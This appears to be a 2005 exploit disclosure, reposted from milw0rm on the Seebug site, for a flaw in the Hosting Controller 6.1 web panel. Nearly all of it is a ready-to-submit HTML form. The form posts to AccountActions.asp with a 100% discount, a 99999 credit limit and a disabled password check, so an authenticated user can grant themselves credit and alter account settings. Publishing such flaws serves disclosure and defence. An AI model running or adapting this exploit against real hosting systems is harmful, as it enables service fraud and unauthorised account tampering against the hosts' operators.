Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group). Title: Hosting controller program have a security bug in "AccountActions.asp" that an authenticated user can change his/her credit and buy some services! Version: 6.1 HotFix 2.1 and older Developer url: hostingcontroller.com Comment: Hosting Controller is an application to manage a host. Exploit code to proof: -------------------------------- GET CREDIT<br>Soroush Dalili from GSG<br> <form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post"> <table> <tr> <td>Username:</td> <td><input type="text" name="UserName" value=""></td> </tr> <tr> <td>Description:</td> <td><input type="text" name="Description" value=""></td> </tr> <tr> <td>FullName:</td> <td><input type="text" name="FullName" value=""></td> </tr> <tr> <td>AccountDisabled 1,[blank]:</td> <td><input type="text" name="AccountDisabled" value=""></td> </tr> <tr> <td>UserChangePassword:</td> <td><input type="text" name="UserChangePassword" value=""></td> </tr> <tr> <td>PassCheck=TRUE,0:</td> <td><input type="text" name="PassCheck" value="0"></td> </tr> <tr> <td>New Password:</td> <td><input type="text" name="Pass1" value=""></td> </tr> <tr> <td>DefaultDiscount%:</td> <td><input type="text" name="DefaultDiscount" value="100"></td> </tr> <tr> <td>CreditLimit:</td> <td><input type="text" name="CreditLimit" value="99999"></td> </tr> </table> <br><input type="submit"> </form> <hr><br> # milw0rm.com [2005-07-10]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论